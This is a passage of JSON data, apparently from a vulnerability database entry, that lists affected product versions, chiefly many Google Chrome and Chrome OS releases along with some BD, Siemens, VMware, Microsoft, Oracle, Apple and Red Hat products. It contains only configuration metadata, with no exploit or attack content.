        "vendor": "google",
        "version": "27.0.1453.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.46"
      },
      {
        "model": "rowa vmax system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.77"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1274.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.954.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1056.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1303.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1015"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.714.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.8"
      },
      {
        "model": "pyxis parx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.150"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.230"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.67"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.172"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.942.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.50"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375125"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.128"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.720.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.904.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.114"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.222.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.212"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.500.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.116"
      },
      {
        "model": "pyxis nursing data collection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.22"
      },
      {
        "model": "security analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1659.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1052.0"
      },
      {
        "model": "content analysis",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "2.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.305.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.89"
      },
      {
        "model": "data innovations",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1034"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.145"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.646.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.911.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.697.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.222"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.593.0"
      },
      {
        "model": "sql server for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "200840"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.667.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.928.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.20"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.339.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1060.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.626.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1031.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.80"
      },
      {
        "model": "facslyric",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.37"
      },
      {
        "model": "facscanto 10-color",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.708.0"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "v80"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.161"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.559.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.625.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1009.0"
      },
      {
        "model": "facsduet sample prep",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.680.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.326"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1062.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.203"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.659.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.881.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.800.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.37599"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.330.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1001"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1056"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.33"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.96"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.768.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.82"
      },
      {
        "model": "windows server for itanium-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.871.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1010.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.31"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.10.140.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1304.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.670.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.378.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.551.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1281.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.0"
      },
      {
        "model": "sinumerik d sl ncu720.3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "840"
      },
      {
        "model": "sinumerik panels wtih integrated tcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1037"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.2"
      },
      {
        "model": "pyxis parassist system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "50.0.2661.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1060"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.126"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.611.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.547.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.300.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.509.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.387.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.382.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.290.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22"
      },
      {
        "model": "vcenter server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.33"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.386.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1056.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1670.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.839.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1281.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1277.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.38"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.764.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.616.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.66"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.82"
      },
      {
        "model": "enterprise linux for power big endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.105"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.4.154.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "45.0.2454"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.71"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.564.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1046"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.50"
      },
      {
        "model": "sql server for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201420"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1081.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.868.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.19"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.126.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.220"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.42"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.397.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.34"
      },
      {
